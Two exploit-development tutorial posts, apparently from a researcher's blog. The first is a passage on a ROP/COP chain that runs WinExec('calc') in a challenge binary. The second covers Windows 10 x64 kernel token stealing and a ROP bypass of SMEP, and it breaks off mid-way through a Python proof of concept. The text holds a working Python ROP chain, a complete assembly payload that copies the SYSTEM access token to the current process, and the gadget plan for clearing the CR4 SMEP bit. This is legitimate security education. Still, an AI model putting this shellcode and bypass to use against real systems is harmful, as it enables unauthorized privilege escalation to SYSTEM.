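    `stack_after_cop_gadget` lists the qwords that sit on the stack right
    after the address of the COP gadget (index 0 is where RSP points).
    """
    stack = list(stack_after_cop_gadget)

    # call r12: the CPU pushes the return address on top of the stack
    stack.insert(0, "return address pushed by call r12")
    rsp_index = 0

    # add rsp, 0x10: skip two qwords (the return address and the padding)
    rsp_index += 0x10 // 8

    # ret: pop the qword RSP now points to into RIP
    return stack[rsp_index]


chain_tail = [0x4141414141414141, "next ROP gadget"]
print(next_gadget_after_cop(chain_tail))  # next ROP gadget
```

Without the padding qword, the ret would skip over the gadget we actually wanted to run next.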

We stumble across another interesting ROP gadget that can help us achieve this goal!

mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret

This ROP gadget is from kernel32.dll. As you can recall, WinExec() is exported by kernel32.dll. This means we already have a valid address within kernel32.dll. Knowing this, we can find the distance between WinExec() and the base of kernel32.dll- which would allow us to dynamically resolve the base virtual address of kernel32.dll.

kernel32_base = kernel32_winexec-0x5e390

WinExec() is 0x5e390 bytes into kernel32.dll (on this version of Windows 10). Subtracting this value will give us the base address of kernel32.dll! Now that we have resolved the base, this will allow us to calculate the offset and virtual memory address of our gadget in kernel32.dll dynamically.
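A short sketch of this subtraction, with one sanity check added. The check assumes that loaded images start on a 64 KB boundary, and both the helper name and the leaked address used here are made up for illustration.

```python
WINEXEC_OFFSET = 0x5E390  # offset of WinExec() for this build of kernel32.dll


def kernel32_base_from_winexec(winexec_address: int) -> int:
    """Derive the kernel32.dll base from a leaked WinExec() address."""
    base = winexec_address - WINEXEC_OFFSET
    # Assumption: module bases are 64 KB aligned, so the low 16 bits should be zero.
    if base & 0xFFFF:
        raise ValueError("unexpected base, the offset may not match this build")
    return base


hypothetical_winexec = 0x7FFA1C35E390
kernel32_base = kernel32_base_from_winexec(hypothetical_winexec)
print(hex(kernel32_base))  # 0x7ffa1c300000
```

If the target runs a different build of kernel32.dll, the offset will differ, and a check like this is a cheap way to notice before sending a ROP chain built on a wrong base.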

Looking back at our ROP gadget- this gives us the ability to take the value in RAX and move it into the value POINTED TO by RCX. RCX already contains the address we would like to overwrite- so this is a perfect match! All we need to do now, is load the string “calc” (null terminated) into RAX! Here is what this looks like all put together.

# Creating a pointer to calc string
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += "calc\x00\x00\x00\x00"					# calc (with null terminator)
exploit_4 += struct.pack('<Q', kernel32_base+0x6130f)		        # mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret: kernel32.dll

# Padding for add rsp, 0x0000000000000080 and pop rbx
exploit_4 += "\x41" * 0x88

One thing to keep in mind is that the ROP gadget that creates the pointer to “calc” (null terminated) has a few extra instructions on the end that we needed to compensate for.

The second parameter is much more straightforward. In kernel32.dll, we found another gadget that allows us to pop our own value into RDX.

# Placing second parameter into rdx
exploit_4 += struct.pack('<Q', kernel32_base+0x19daa)		# pop rdx ; add eax, 0x15FF0006 ; ret: kernel32.dll
exploit_4 += struct.pack('<Q', 0x01)			        # SW_SHOWNORMAL

Perfect! At this point, all we need to do is place the call to WinExec() on the stack! This is done with the following snippet of code.

# Calling kernel32!WinExec
exploit_4 += struct.pack('<Q', base_address+0x10a1)		# ret: eko2019.exe (ROP NOP)
exploit_4 += struct.pack('<Q', kernel32_winexec)	        # Address of kernel32!WinExec

In addition, we need to return to a valid address on the stack after the call to WinExec() so our program doesn’t crash after calc.exe is called. This is outlined below.

exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x2e71)			# add rsp, 0x38 ; ret: eko2019.exe

The final exploit code can be found here on my GitHub.

Let’s step through this final exploit in WinDbg to see how things break down.

We have already shown that our stack pivot was successful. After the pivot back to the stack and our ROP NOP which just returns back to the stack is executed, we can see that our pop r12 instruction has been hit. This will load a ROP gadget into R12 that will return to the stack- due to the fact our main ROP gadget calls R12, as explained earlier.

After we step through the instruction, we can see our ROP gadget for returning back to the stack has been loaded into R12.

We hit our next gadget, which pops the writeable address in the .data section of eko2019.exe into RAX. This value will be eventually placed into the RCX register- where the first function argument for WinExec() needs to be.

RAX now contains the blank, writeable address in the .data section.

After this gadget returns, we hit our main gadget of mov rcx, rax ; call r12.

The value of RAX is then placed into RCX. After this occurs, we can see that R12 is called and is going to execute our return back to the stack, add rsp, 0x10 ; ret.

Perfect! Our COP gadget and ROP gadgets worked together to load our intended address into RCX.

Next, we execute our next pop rax gadget, which loads the value of “calc” (null terminated) into RAX. 636c6163 decodes to “clac” when converting hex to text. The string appears reversed because of the endianness of our processor (little endian).

We land on our most important ROP gadget to date after the return from the above gadget. This will take the string “calc” (null terminated) and write it to the address in RCX.
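The byte order can be checked quickly outside of the debugger. A minimal Python sketch using the same 8 bytes the ROP chain places on the stack:

```python
import struct

calc_bytes = b"calc\x00\x00\x00\x00"  # the 8 bytes popped into RAX

# Interpreting those bytes as a little-endian qword gives the register value
rax_value = struct.unpack("<Q", calc_bytes)[0]
print(hex(rax_value))  # 0x636c6163

# Reading the register value's hex digits left to right gives the reversed text
print(bytes.fromhex("636c6163").decode())  # clac
```

When the value is written back to memory, the lowest byte is stored first, so the string in memory reads “calc” again.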

The address in RCX now points to the null terminated string “calc”.

Perfect! All we have to do now, is pop 0x1 into RDX- which has been completed by the subsequent ROP gadget.

Perfect! We have now landed on the call to WinExec()- and we can execute our shellcode!

All that is left to do now, is let everything run as intended!

Let’s run the final exploit.

Calc.exe FTW!

Big shoutout to Blue Frost Security for this binary- this was a very challenging experience and I feel I learned a lot from it. A big shout out as well to my friend @trickster012 for helping me with some of the problems I was having with __fastcall initially. Please contact me with any comments, questions, or corrections.

Peace, love, and positivity :-)

Exploit Development: Panic! At The Kernel - Token Stealing Payloads Revisited on Windows 10 x64 and Bypassing SMEP

1 February 2020 at 00:00

Introduction

Same ol’ story with this blog post- I am continuing to expand my research/overall knowledge on Windows kernel exploitation, in addition to garnering more experience with exploit development in general. Previously I have talked about a couple of vulnerability classes on Windows 7 x86, which is an OS with minimal protections. With this post, I wanted to take a deeper dive into token stealing payloads, which I have previously talked about on x86, and see what differences the x64 architecture may have. In addition, I wanted to try to do a better job of explaining how these payloads work. This post and research also aims to get myself more familiar with the x64 architecture, which is far more common in 2020, and understand protections such as Supervisor Mode Execution Prevention (SMEP).

Gimme Dem Tokens!

As a part of Windows, there is something known as the SYSTEM process. The SYSTEM process, PID of 4, houses the majority of kernel mode system threads. The threads stored in the SYSTEM process only run in the context of kernel mode. Recall that a process is a “container”, of sorts, for threads. A thread is the actual item within a process that performs the execution of code. You may be asking “How does this help us?” Especially, if you did not see my last post. In Windows, each process object, known as _EPROCESS, has something known as an access token. Recall that an object is a dynamically created (configured at runtime) structure. Continuing on, this access token determines the security context of a process or a thread. Since the SYSTEM process houses execution of kernel mode code, it will need to run in a security context that allows it to access the kernel. This would require system or administrative privilege. This is why our goal will be to identify the access token value of the SYSTEM process and copy it to a process that we control, or the process we are using to exploit the system. From there, we can spawn cmd.exe from the now privileged process, which will grant us NT AUTHORITY\SYSTEM privileged code execution.

Identifying the SYSTEM Process Access Token

We will use Windows 10 x64 to outline this overall process. First, boot up WinDbg on your debugger machine and start a kernel debugging session with your debuggee machine (see my post on setting up a debugging environment). In addition, I noticed on Windows 10, I had to execute the following command on my debugger machine after completing the bcdedit.exe commands from my previous post: bcdedit.exe /dbgsettings serial debugport:1 baudrate:115200

Once that is setup, execute the following command, to dump the active processes:

!process 0 0

This returns a few fields of each process. We are most interested in the “process address”, which has been outlined in the image above at address 0xffffe60284651040. This is the address of the _EPROCESS structure for a specified process (the SYSTEM process in this case). After enumerating the process address, we can enumerate much more detailed information about the process using the _EPROCESS structure.

dt nt!_EPROCESS <Process address>

dt will display information about various variables, data types, etc. As you can see from the image above, various data types of the SYSTEM process’s _EPROCESS structure have been displayed. If you continue down the kd window in WinDbg, you will see the Token field, at an offset of _EPROCESS + 0x358.

What does this mean? That means for each process on Windows, the access token is located at an offset of 0x358 from the process address. We will for sure be using this information later. Before moving on, however, let’s take a look at how a Token is stored.
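As a quick worked example of that offset, using the SYSTEM process address from the !process output above (the function name is made up, and the 0x358 offset is specific to the Windows 10 build used in this post):

```python
TOKEN_OFFSET = 0x358  # offset of Token inside _EPROCESS on this build


def token_field_address(eprocess_address: int) -> int:
    """Address of the _EX_FAST_REF holding the token for a given _EPROCESS."""
    return eprocess_address + TOKEN_OFFSET


system_eprocess = 0xFFFFE60284651040
print(hex(token_field_address(system_eprocess)))  # 0xffffe60284651398
```

The same addition applies to any other process address returned by !process, as long as the build (and therefore the offset) is the same.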

As you can see from the above image, there is something called _EX_FAST_REF, or an Executive Fast Reference union. The difference between a union and a structure, is that a union stores data types at the same memory location (notice there is no difference in the offset of the various fields to the base of an _EX_FAST_REF union as shown in the image below. All of them are at an offset of 0x000). This is what the access token of a process is stored in. Let’s take a closer look.

dt nt!_EX_FAST_REF

Take a look at the RefCnt element. This is a value, appended to the access token, that keeps track of references of the access token. On x86, this is 3 bits. On x64 (which is our current architecture) this is 4 bits, as shown above. We want to clear these bits out, using bitwise AND. That way, we just extract the actual value of the Token, and not other unnecessary metadata.

To extract the value of the token, we simply need to view the _EX_FAST_REF union of the SYSTEM process at an offset of 0x358 (which is where our token resides). From there, we can figure out how to go about clearing out RefCnt.

dt nt!_EX_FAST_REF <Process address>+0x358

As you can see, RefCnt is equal to 0y0111. 0y denotes a binary value. So this means RefCnt in this instance equals 7 in decimal.

So, let’s use bitwise AND to try to clear out those last few bits.

? TOKEN & 0xf

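As you can see, the result is 7. This is not the value we want- it is actually the inverse of it, since AND with 0xf keeps only the RefCnt bits and throws the pointer away. Logic tells us we should AND with the bitwise complement of 0xf instead, which is 0xfffffffffffffff0 (equivalently -0x10 in two’s complement, not -0xf). That mask keeps every bit except the lowest four.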
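The masking step can be sketched outside of WinDbg with plain integer arithmetic. This is only an illustration: the `fast_ref` value below is a made-up placeholder rather than a value read from a real machine, and the only thing taken from the text is that RefCnt occupies the low 4 bits on x64.

```python
# Hypothetical _EX_FAST_REF value; the low 4 bits hold RefCnt (0y0111 == 7)
fast_ref = 0xffffc18f4a6b2047

REFCNT_MASK = 0xf                      # 4 bits of RefCnt on x64

ref_cnt = fast_ref & REFCNT_MASK       # keeps only RefCnt, discards the pointer
token = fast_ref & ~REFCNT_MASK        # clears RefCnt, keeps the pointer (~0xf == -0x10)

print(hex(ref_cnt))
print(hex(token))
```

The first AND mirrors the `? TOKEN & 0xf` attempt, and the second is the mask that actually yields the raw token pointer.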

So- we have finally extracted the value of the raw access token. At this point, let’s see what happens when we copy this token to a normal cmd.exe session.

Opening a new cmd.exe process on the debuggee machine:

After spawning a cmd.exe process on the debuggee, let’s identify the process address in the debugger.

!process 0 0 cmd.exe

As you can see, the process address for our cmd.exe process is located at 0xffffe6028694d580. We also know, based on our research earlier, that the Token of a process is located at an offset of 0x358 from the process address. Let’s use WinDbg to overwrite the cmd.exe access token with the access token of the SYSTEM process.

Now, let’s take a look back at our previous cmd.exe process.

As you can see, cmd.exe has become a privileged process! Now the only question remains- how do we do this dynamically with a piece of shellcode?

Assembly? Who Needs It. I Will Never Need To Know That- It’s iRrElEvAnT

‘Nuff said.

Anyways, let’s develop an assembly program that can dynamically perform the above tasks in x64.

So let’s start with this logic- instead of spawning a cmd.exe process and then copying the SYSTEM process access token to it- why don’t we just copy the access token to the current process when exploitation occurs? The current process during exploitation should be the process that triggers the vulnerability (the process where the exploit code is run from). From there, we could spawn cmd.exe from (and in the context of) our current process after our exploit has finished. That cmd.exe process would then inherit the SYSTEM token.

Before we can get there though, let’s look into how we can obtain information about the current process.

If you use the Microsoft Docs (formerly known as MSDN) to look into process data structures you will come across this article. This article states there is a kernel routine that can identify the current process and return a pointer to it! PsGetCurrentProcess() is that routine. It identifies the current thread and then returns a pointer to the process in which that thread is found. This is identical to IoGetCurrentProcess(). However, Microsoft recommends users invoke PsGetCurrentProcess() instead. Let’s unassemble that function in WinDbg.

uf nt!PsGetCurrentProcess

Let’s take a look at the first instruction, mov rax, qword ptr gs:[188h]. As you can see, the GS segment register is in use here. This register points to a data segment, used to access different types of data structures. If you take a closer look at this segment, at an offset of 0x188 bytes, you will see KiInitialThread. This is a pointer to the _KTHREAD entry in the current thread’s _ETHREAD structure. As a point of clarification, know that _KTHREAD is the first entry in the _ETHREAD structure. The _ETHREAD structure is the thread object for a thread (similar to how _EPROCESS is the process object for a process) and will display more granular information about a thread. nt!KiInitialThread is the address of that _ETHREAD structure. Let’s take a closer look.

dqs gs:[188h]

This shows the GS segment register, at an offset of 0x188, holds an address of 0xffffd500e0c0cc00 (different on your machine because of ASLR/KASLR). This should be the nt!KiInitialThread, or the _ETHREAD structure for the current thread. Let’s verify this with WinDbg.

!thread -p

As you can see, we have verified that nt!KiInitialThread represents the address of the current thread.

Recall what was mentioned about threads and processes earlier. Threads are the part of a process that actually perform execution of code (for our purposes, these are kernel threads). Now that we have identified the current thread, let’s identify the process associated with that thread (which would be the current process). Let’s go back to the image above where we unassembled the PsGetCurrentProcess() function.

mov rax, qword ptr [rax+0B8h]

RAX already contains the value of the GS segment register at an offset of 0x188 (which contains the current thread). The above assembly instruction will move the value of nt!KiInitialThread + 0xB8 into RAX. Logic tells us this has to be the location of our current process, as the only instruction left in the PsGetCurrentProcess() routine is a ret. Let’s investigate this further.

Since we believe this is going to be our current process, let’s view this data in an _EPROCESS structure.

dt nt!_EPROCESS poi(nt!KiInitialThread+0xb8)

First, a little WinDbg kung-fu. poi essentially dereferences a pointer, which means obtaining the value a pointer points to.

And as you can see, we have found where our current process is! The current process at this time is the SYSTEM process (PID = 4). This is subject to change depending on what is executing, etc. But, it is very important we are able to identify the current process.

Let’s start building out an assembly program that tracks what we are doing.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		    ; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	    ; Current process (_EPROCESS)
  	mov rbx, rax			    ; Copy current process (_EPROCESS) to rbx

Notice that I copied the current process, stored in RAX, into RBX as well. You will see why this is needed here shortly.

Take Me For A Loop!

Let’s take a look at a few more elements of the _EPROCESS structure.

dt nt!_EPROCESS

Let’s take a look at the data structure of ActiveProcessLinks, _LIST_ENTRY

dt nt!_LIST_ENTRY

ActiveProcessLinks is what keeps track of the list of current processes. How does it keep track of these processes you may be wondering? Its data structure is _LIST_ENTRY, a doubly linked list. This means that each element in the linked list not only points to the next element, but it also points to the previous one. Essentially, the elements point in each direction. As mentioned earlier and just as a point of reiteration, this linked list is responsible for keeping track of all active processes.

There are two elements of _EPROCESS we need to keep track of. The first element, located at an offset of 0x2e0 on Windows 10 x64, is UniqueProcessId. This is the PID of the process. The other element is ActiveProcessLinks, which is located at an offset 0x2e8.

So essentially what we can do in x64 assembly is locate the current process using the aforementioned method from PsGetCurrentProcess(). From there, we can loop through the _EPROCESS structure’s ActiveProcessLinks element (which keeps track of every process via a doubly linked list). After following the current ActiveProcessLinks element to the next process, we can compare that process’s UniqueProcessId (PID) to the constant 4, which is the PID of the SYSTEM process. Let’s continue our already started assembly program.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	; Current process (_EPROCESS)
  	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
	
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found
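To make the loop logic easier to follow, here is a rough user mode model of the same walk in Python. It is only a sketch: the "memory" is a plain bytearray, the process blocks are fake, and `EPROCESS_SIZE`, `build_fake_memory()`, and `find_process()` are names invented for this illustration. The 0x2e0 and 0x2e8 offsets are the ones from the text. Unlike the assembly, the model also stops if it walks all the way around the list without a match.

```python
import struct

PID_OFFSET = 0x2e0      # _EPROCESS.UniqueProcessId (offset from the text)
LINKS_OFFSET = 0x2e8    # _EPROCESS.ActiveProcessLinks (Flink is its first field)
EPROCESS_SIZE = 0x400   # hypothetical block size, just large enough for this model


def build_fake_memory(pids, base=0x1000):
    """Lay out fake _EPROCESS blocks in a flat buffer and link them in a ring."""
    mem = bytearray(base + EPROCESS_SIZE * len(pids))
    addrs = [base + i * EPROCESS_SIZE for i in range(len(pids))]
    for i, (addr, pid) in enumerate(zip(addrs, pids)):
        nxt = addrs[(i + 1) % len(addrs)]
        prv = addrs[(i - 1) % len(addrs)]
        struct.pack_into("<Q", mem, addr + PID_OFFSET, pid)
        # Flink/Blink point at the neighbour's ActiveProcessLinks field,
        # not at the start of the neighbour's _EPROCESS
        struct.pack_into("<QQ", mem, addr + LINKS_OFFSET,
                         nxt + LINKS_OFFSET, prv + LINKS_OFFSET)
    return mem, addrs


def read_qword(mem, addr):
    return struct.unpack_from("<Q", mem, addr)[0]


def find_process(mem, start, wanted_pid):
    """Mirror of __loop: follow Flink, step back to the _EPROCESS base, compare the PID."""
    current = start
    while True:
        current = read_qword(mem, current + LINKS_OFFSET) - LINKS_OFFSET
        if read_qword(mem, current + PID_OFFSET) == wanted_pid:
            return current
        if current == start:
            return None     # walked the whole ring without a match


mem, addrs = build_fake_memory([4, 500, 1234])
system_block = find_process(mem, addrs[2], 4)   # start from the "current" process
print(hex(system_block))
```

The subtraction of `LINKS_OFFSET` is the important detail: a list entry points into the middle of the next structure, so the walk has to step back by 0x2e8 before reading any other field.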

Once the SYSTEM process’s _EPROCESS structure has been found, we can now go ahead and retrieve the token and copy it to our current process. This will unleash God mode on our current process. God, please have mercy on the soul of our poor little process.

Once we have found the SYSTEM process, remember that the Token element is located at an offset of 0x358 to the _EPROCESS structure of the process.

Let’s finish out the rest of our token stealing payload for Windows 10 x64.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]		; Current process (_EPROCESS)
	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found

	mov rcx, [rbx + 0x358]		; SYSTEM token is @ offset _EPROCESS + 0x358
	and cl, 0xf0			; Clear out _EX_FAST_REF RefCnt
	mov [rax + 0x358], rcx		; Copy SYSTEM token to current process

	xor rax, rax			; set NTSTATUS SUCCESS
	ret				; Done!

Notice our use of bitwise AND. We are clearing out the last 4 bits of the RCX register, via the CL register. If you have read my post about a socket reuse exploit, you will know I talk about using the lower byte registers of the x86 or x64 registers (RCX, ECX, CX, CH, CL, etc). The last 4 bits we need to clear out, on an x64 architecture, are located in the low (L) 8-bit register (CL, AL, BL, etc).

As you can also see, we ended our shellcode by using bitwise XOR to clear out RAX. RAX is the register that carries the NTSTATUS return value back to the caller. An NTSTATUS value of 0 (STATUS_SUCCESS) means the operation was performed successfully.
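As a quick sanity check, the effect of and cl, 0xf0 on the full 64-bit register can be modeled in Python. This is a sketch with a made-up register value, and `and_cl()` is a helper invented here: it only touches the low byte, exactly as an 8-bit operation on CL would.

```python
def and_cl(rcx, imm8):
    """Model `and cl, imm8`: only the low 8 bits of RCX are modified."""
    upper = rcx & ~0xFF             # bits 8..63 are left untouched
    low = (rcx & 0xFF) & imm8       # CL after the AND
    return upper | low


rcx = 0xffffc18f4a6b2047            # hypothetical _EX_FAST_REF value read from the Token field
cleared = and_cl(rcx, 0xf0)

print(hex(cleared))
```

Because RefCnt lives entirely inside the low byte, masking CL with 0xf0 gives the same result as masking the whole register with 0xfffffffffffffff0, but with a much shorter instruction encoding.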

Before we go ahead and show off our payload, let’s develop an exploit that outlines bypassing SMEP. We will use a stack overflow as an example, in the kernel, to outline using ROP to bypass SMEP.

SMEP Says Hello

What is SMEP? SMEP, or Supervisor Mode Execution Prevention, is a protection that was first implemented in Windows 8 (in the context of Windows). When we talk about executing code for a kernel exploit, the most common technique is to allocate the shellcode in user mode and then call it from the kernel. This means the user mode code will be called in the context of the kernel, giving us the applicable permissions to obtain SYSTEM privileges.

SMEP is a protection that does not allow us to execute code stored in a ring 3 page from ring 0 (executing code that lives in a higher-numbered, less privileged ring in general). This means we cannot execute user mode code from kernel mode. In order to bypass SMEP, let’s understand how it is implemented.

SMEP policy is mandated/enabled via the CR4 register. According to Intel, the CR4 register is a control register. Each bit in this register is responsible for various features being enabled on the OS. Bit 20 of the CR4 register (counting from zero at the least significant bit, referred to as the 20th bit throughout this post) is responsible for SMEP being enabled. If the 20th bit of the CR4 register is set to 1, SMEP is enabled. When the bit is set to 0, SMEP is disabled. Let’s take a look at the CR4 register on Windows with SMEP enabled in normal hexadecimal format, as well as binary (so we can really see where that 20th bit resides).

r cr4

The CR4 register has a value of 0x00000000001506f8 in hexadecimal. Let’s view that in binary, so we can see where the 20th bit resides.

.formats cr4

As you can see, the 20th bit is outlined in the image above (counting from the right). Let’s use the .formats command again to see what the value in the CR4 register needs to be, in order to bypass SMEP.

As you can see from the above image, when the 20th bit of the CR4 register is flipped, the hexadecimal value would be 0x00000000000506f8.
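The same arithmetic that .formats shows can be reproduced in a few lines of Python. This sketch uses the two CR4 values quoted in this post; the name `SMEP_BIT` is just a label chosen for this example.

```python
SMEP_BIT = 1 << 20                  # bit 20 of CR4, counting from zero

cr4_enabled = 0x1506f8              # CR4 value shown by `r cr4` in this post
cr4_disabled = cr4_enabled & ~SMEP_BIT

print(format(cr4_enabled, "024b"))  # binary view, like .formats
print(format(cr4_disabled, "024b"))
print(hex(cr4_disabled))
```

The only difference between the two values is 0x100000, which is why the desired CR4 value in the ROP chain is simply 0x506f8.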

This post will cover how to bypass SMEP via ROP using the above information. Before we do, let’s talk a bit more about SMEP implementation and other potential bypasses.

SMEP is ENFORCED via the page table entry (PTE) of a memory page through the form of “flags”. Recall that a page table is what contains information about which part of physical memory maps to virtual memory. The PTE for a memory page has various flags that are associated with it. One of those flags is the U/S flag: U for user mode or S for supervisor mode (kernel mode). This flag is checked by the memory management unit (MMU) when said memory is accessed. Before we move on, let’s talk about CPU modes for a second. Ring 3 is responsible for user mode application code. Ring 0 is responsible for operating system level code (kernel mode). The CPU can transition its current privilege level (CPL) based on what is executing. I will not get into the lower level details of syscalls, sysrets, or other various routines that occur when the CPU changes the CPL. This is also not a blog on how paging works. If you are interested in learning more, I HIGHLY suggest the book What Makes It Page: The Windows 7 (x64) Virtual Memory Manager by Enrico Martignetti. Although this is specific to Windows 7, I believe these same concepts apply today. I give this background information because SMEP bypasses could potentially abuse this functionality.

Think of the implementation of SMEP as the following:

Laws are created by the government. HOWEVER, the legislators do not roam the streets enforcing the law. This is the job of our police force.

The same concept applies to SMEP. SMEP is enabled by the CR4 register- but the CR4 register does not enforce it. That is the job of the page table entries.

Why bring this up? Although we will be outlining a SMEP bypass via ROP, let’s consider another scenario. Let’s say we have an arbitrary read and write primitive. Put aside the fact that PTEs are randomized for now. What if you had a read primitive to know where the PTE for the memory page of your shellcode was? Another potential (and interesting) way to bypass SMEP would be not to “disable SMEP” at all. Let’s think outside the box! Instead of “going to the mountain”- why not “bring the mountain to us”? We could potentially use our read primitive to locate the PTE of our user mode shellcode page, and then use our write primitive to overwrite that PTE and flip the U (user mode) flag into an S (supervisor mode) flag! That way, when that particular address is executed, although it is a “user mode address”, it is still executed because the permissions of that page are now those of a kernel mode page.

Although page table entries are randomized now, this presentation by Morten Schenk of Offensive Security talks about derandomizing page table entries.

Morten explains the steps as the following, if you are too lazy to read his work:

  1. Obtain read/write primitive
  2. Leak ntoskrnl.exe (kernel base)
  3. Locate MiGetPteAddress() (can be done dynamically instead of static offsets)
  4. Use PTE base to obtain PTE of any memory page
  5. Change bit (whether it is copying shellcode to page and flipping NX bit or flipping U/S bit of a user mode page)

Again, I will not be covering this method of bypassing SMEP until I have done more research on memory paging in Windows. See the end of this blog for my thoughts on other SMEP bypasses going forward.

SMEP Says Goodbye

Let’s use an overflow to outline bypassing SMEP with ROP. ROP assumes we have control over the stack (as each ROP gadget returns back to the stack). Since SMEP is enabled, our ROP gadgets will need to come from kernel mode pages. Since we are assuming medium integrity here, we can call EnumDeviceDrivers() to obtain the kernel base- which bypasses KASLR.

Essentially, here is how our ROP chain will work

-------------------
pop <reg> ; ret
-------------------
VALUE_WANTED_IN_CR4 (0x506f8) - This can be our own user supplied value.
-------------------
mov cr4, <reg> ; ret
-------------------
User mode payload address
-------------------

Let’s go hunting for these ROP gadgets. (NOTE - ALL OFFSETS TO ROP GADGETS WILL VARY DEPENDING ON OS, PATCH LEVEL, ETC.) Remember, these ROP gadgets need to be kernel mode addresses. We will use rp++ to enumerate rop gadgets in ntoskrnl.exe. If you take a look at my post about ROP, you will see how to use this tool.

Let’s figure out a way to control the contents of the CR4 register. Although we probably won’t be able to manipulate the contents of the register directly, perhaps we can move the contents of a register that we can control into the CR4 register. Recall that a pop <reg> operation will take the next item on the stack and store it in the register named in the pop operation. Let’s keep this in mind.

Using rp++, we have found a nice ROP gadget in ntoskrnl.exe that allows us to load the CR4 register with the contents of the ECX register (the lower 32 bits of the RCX register).

As you can see, this ROP gadget is “located” at 0x140108552. However, since rp++ is parsing ntoskrnl.exe from user mode (and not run as an administrator), it cannot give us the address where the kernel is actually loaded. What it reports is relative to the image’s preferred base address. If you strip that base (0x140000000) off the front, the rest of the “address” is really an offset from the kernel base. This means this ROP gadget is located at ntoskrnl.exe + 0x108552.

Awesome! rp++ was a bit wrong in its enumeration. rp++ says that we can put ECX into the CR4 register. However, upon further inspection, we can see this ROP gadget ACTUALLY points to a mov cr4, rcx instruction. This is perfect for our use case! We have a way to move the contents of the RCX register into the CR4 register. You may be asking “Okay, we can control the CR4 register via the RCX register- but how does this help us?” Recall one of the properties of ROP from my previous post. Whenever we had a nice ROP gadget that allowed a desired instruction, but there was an unnecessary pop in the gadget, we used filler data of NOPs. This is because we are just simply placing data in a register- we are not executing it.
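The conversion from an rp++ “address” to a usable kernel address is simple arithmetic, sketched below. The preferred image base of 0x140000000 is an assumption about how this ntoskrnl.exe was linked, and `example_kernel_base` is a placeholder standing in for whatever EnumDeviceDrivers() returns at runtime.

```python
PREFERRED_IMAGE_BASE = 0x140000000      # assumed preferred base of ntoskrnl.exe on disk

rp_address = 0x140108552                # gadget "address" as printed by rp++
gadget_offset = rp_address - PREFERRED_IMAGE_BASE

example_kernel_base = 0xfffff80000000000    # hypothetical runtime base (differs every boot)
gadget_runtime = example_kernel_base + gadget_offset

print(hex(gadget_offset))
print(hex(gadget_runtime))
```

Only the offset is stable for a given build of the kernel; the runtime address has to be recomputed from the leaked base each time.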

The same principle applies here. If we can pop our intended flag value into RCX, we should have no problem. As we saw before, our intended CR4 register value should be 0x506f8.

Real quick- let’s say rp++ was right in that we could only control the contents of the ECX register (instead of RCX). Would this affect us?

Recall, however, how the registers work here.

-----------------------------------
               RCX
-----------------------------------
                       ECX
-----------------------------------
                             CX
-----------------------------------
                           CH    CL
-----------------------------------

This means, even though RCX contains 0x00000000000506f8, a mov cr4, ecx would take the lower 32 bits of RCX (which is ECX) and place them into the CR4 register. This would mean ECX would equal 0x000506f8- and that value would end up in CR4. So even though we would theoretically be using both RCX and ECX, due to a lack of pop ecx ROP gadgets, we will be unaffected!
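The register aliasing in the diagram above can be checked with a few masks. This is a small sketch using the CR4 value from this post as the contents of RCX.

```python
rcx = 0x00000000000506f8        # intended CR4 value sitting in RCX

ecx = rcx & 0xFFFFFFFF          # lower 32 bits
cx = rcx & 0xFFFF               # lower 16 bits
ch = (rcx >> 8) & 0xFF          # bits 8..15
cl = rcx & 0xFF                 # lowest 8 bits

print(hex(ecx), hex(cx), hex(ch), hex(cl))
```

Since the intended value fits comfortably in 32 bits, ECX and RCX hold the same number here, which is why either form of the gadget would work.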

Now, let’s continue on to controlling the RCX register.

Let’s find a pop rcx gadget!

Nice! We have a ROP gadget located at ntoskrnl.exe + 0x3544. Let’s update our POC with some breakpoints where our user mode shellcode will reside, to verify we can hit our shellcode. This POC takes care of the semantics such as finding the offset to the ret instruction we are overwriting, etc.

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


payload = bytearray(
    "\xCC" * 50
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
